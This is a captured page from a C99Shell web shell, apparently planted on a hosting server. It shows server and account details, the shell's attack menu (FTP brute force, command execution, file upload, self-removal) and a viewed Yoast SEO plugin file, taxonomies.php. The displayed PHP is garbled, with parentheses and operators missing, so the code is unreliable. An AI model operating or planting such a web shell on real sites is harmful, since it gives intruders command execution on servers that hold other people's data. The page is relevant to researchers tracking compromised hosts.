!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordpress-seo/admin/views/tabs/metas/   drwxr-xr-x
Free 182.6 GB of 490.84 GB (37.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     taxonomies.php (2.11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Admin\Views
 */

if ( ! defined'WPSEO_VERSION' ) ) {
    
header'Status: 403 Forbidden' );
    
header'HTTP/1.1 403 Forbidden' );
    exit();
}

$taxonomies get_taxonomies( array( 'public' => true ), 'objects' );
if ( 
is_array$taxonomies ) && $taxonomies !== array() ) {
    foreach ( 
$taxonomies as $tax ) {
        
// Explicitly hide all the core taxonomies we never want to do stuff for.
        
if ( in_array$tax->name, array( 'link_category''nav_menu' ) ) ) {
            continue;
        }

        echo 
'<h2>' esc_htmlucfirst$tax->labels->name ) ) . '</h2>';
        if ( 
$tax->name === 'post_format' ) {
            
$yform->light_switch(
                
'disable-post_format',
                
__'Format-based archives''wordpress-seo' ),
                array( 
__'Enabled''wordpress-seo' ), __'Disabled''wordpress-seo' ) ),
                
false
            
);
        }
        echo 
"<div id='" esc_attr$tax->name ) . "-titles-metas'>";
        
$yform->textinput'title-tax-' $tax->name__'Title template''wordpress-seo' ), 'template taxonomy-template' );
        
$yform->textarea'metadesc-tax-' $tax->name__'Meta description template''wordpress-seo' ), array( 'class' => 'template taxonomy-template' ) );
        if ( 
$options['usemetakeywords'] === true ) {
            
$yform->textinput'metakey-tax-' $tax->name__'Meta keywords template''wordpress-seo' ) );
        }
        
$yform->toggle_switch'noindex-tax-' $tax->name$index_switch_values__'Meta Robots''wordpress-seo' ) );
        if ( 
$tax->name !== 'post_format' ) {
            
/* translators: %1$s expands to Yoast SEO */
            
$yform->toggle_switch'hideeditbox-tax-' $tax->name,
                array(
                    
'off' => __'Show''wordpress-seo' ),
                    
'on'  => __'Hide''wordpress-seo' ),
                    
/* translators: %1$s expands to Yoast SEO */
                
), sprintf__'%1$s Meta Box''wordpress-seo' ), 'Yoast SEO' ) );
        }
        
/**
         * Allow adding custom checkboxes to the admin meta page - Taxonomies tab
         *
         * @api  WPSEO_Admin_Pages  $yform  The WPSEO_Admin_Pages object
         * @api  Object             $tax    The taxonomy
         */
        
do_action'wpseo_admin_page_meta_taxonomies'$yform$tax );
        echo 
'<br/><br/>';
        echo 
'</div>';
    }
    unset( 
$tax );
}
unset( 
$taxonomies );

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0118 ]--